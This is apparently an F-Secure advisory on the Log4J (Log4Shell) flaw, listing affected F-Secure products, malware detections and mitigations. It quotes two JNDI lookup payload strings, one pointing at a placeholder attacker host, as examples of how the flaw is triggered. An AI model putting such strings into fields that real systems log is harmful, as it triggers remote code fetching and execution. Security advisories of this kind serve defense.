A security flaw in the Log4J library, which was discovered on Friday, December 10th, rocked software manufacturers and service providers around the globe. The weak point in this widely used method for processing log messages, found in software from Microsoft's Minecraft to e-commerce platforms, is already being actively exploited.
It is almost impossible to describe the extent of the risk that currently exists in vulnerable applications. If a user-controlled string that targets the vulnerability is logged, the vulnerability can be exploited remotely. In simple terms, an attacker can use this vulnerability to trick the target system into fetching and executing code from a remote location. In the second step, it is up to the attacker what the malicious code should do.
An "almost perfect storm"
This vulnerability shows how difficult it is to secure enterprise software at multiple levels. Outdated software, including older versions of Java, is forcing many companies to develop their own patches or is preventing them from patching right away. Another complication arises from the challenge of patching the logging functions of Log4j in real time, especially when the threat of attacks is so high and the logging is so important.
All recommended countermeasures should be implemented “immediately”, writes the Cybersecurity & Infrastructure Security Agency in a blog post.
There is not much that individual users can do other than install updates for various online services as they become available. And that should be done immediately. Firms and businesses will work non-stop to deploy patches while securing their own systems. After that, it will be important to determine if there is an active security incident in progress in the affected systems.
Vulnerabilities almost everywhere
It can be more difficult to find an application that doesn't use the Log4J Library than one that does. This omnipresence means that attackers can search for vulnerabilities almost anywhere.
"Please do NOT change the name of your Tesla or iPhone to ${jndi:ldap://url/a}, unless you want an unexpected event," says Erka Koivunen, Chief Information Security Officer at F-Secure, jokingly.
A string written in Log4J's lookup syntax can trigger the vulnerability in affected applications. As we know, merely typing a phrase like ${jndi:ldap://attacker.com/pwnyourserver} into a Minecraft chat on an unpatched system, for example, can trigger a security storm at Microsoft.
Are F-Secure products affected?
F-Secure has determined that the following products are affected by this vulnerability:
- F-Secure Policy Manager
- F-Secure Policy Manager Proxy
- F-Secure Endpoint Proxy
- F-Secure Elements Connector
Both Windows and Linux versions of these products are affected and should be patched immediately.
How can I patch my F-Secure product?
We have developed a security patch for this vulnerability. The latest news and updates on this vulnerability will be published on our community page on an ongoing basis.
What protection does F-Secure offer against this security gap?
F-Secure Endpoint Protection (EPP) is constantly updated with detections for the latest local exploit files, but given the many ways a vulnerability can be exploited, this only covers part of the problem.
EPP detections, as usual, deal with any payload seen in the post-exploitation phase. As of this writing, F-Secure has made the following detections, which cover some serious attack scenarios. These are malicious payloads that we have observed in connection with Log4j exploits.
- TR/Drop.Cobacis.AL
- TR/Rozena.wrdej
- TR/PShell.Agent.SWR
- TR/Coblat.G1
- TR/AD.MeterpreterSC.rywng
Many of these detections have been available in F-Secure EPP for months, which means customers are proactively protected from these payloads.
Other existing detections can also be helpful as there are several ways to take advantage of the exploit. This list of useful detections will be continually updated as the situation evolves. Refer to the general recommendations in the following section for additional workarounds.
What general measures should you take with any software, regardless of the manufacturer?
- Restrict network access or restrict it to trusted sites. If your system cannot connect to the internet to retrieve the malicious code, the attack will fail.
- Check with vendors regularly to see if they have any information about patches and other workarounds for security vulnerabilities.
- F-Secure Elements Vulnerability Management can help identify vulnerable systems.
- F-Secure Elements Endpoint Protection or F-Secure Business Suite products can detect and patch the vulnerable software on the system on which they are installed.
F-Secure also keeps all customers and users permanently up to date.
More at F-Secure.com
About F-Secure
Nobody has a better insight into real cyberattacks than F-Secure. We bridge the gap between detection and response. To do this, we leverage the unmatched threat expertise of hundreds of the best technical advisors in our industry, data from millions of devices using our award-winning software, and ongoing innovations in artificial intelligence. Leading banks, airlines and corporations trust our commitment to fight the world's most dangerous cyber threats. Together with our network of top channel partners and over 200 service providers, it is our mission to provide all of our customers with tailored, enterprise-grade cybersecurity. F-Secure was founded in 1988 and is listed on NASDAQ OMX Helsinki Ltd.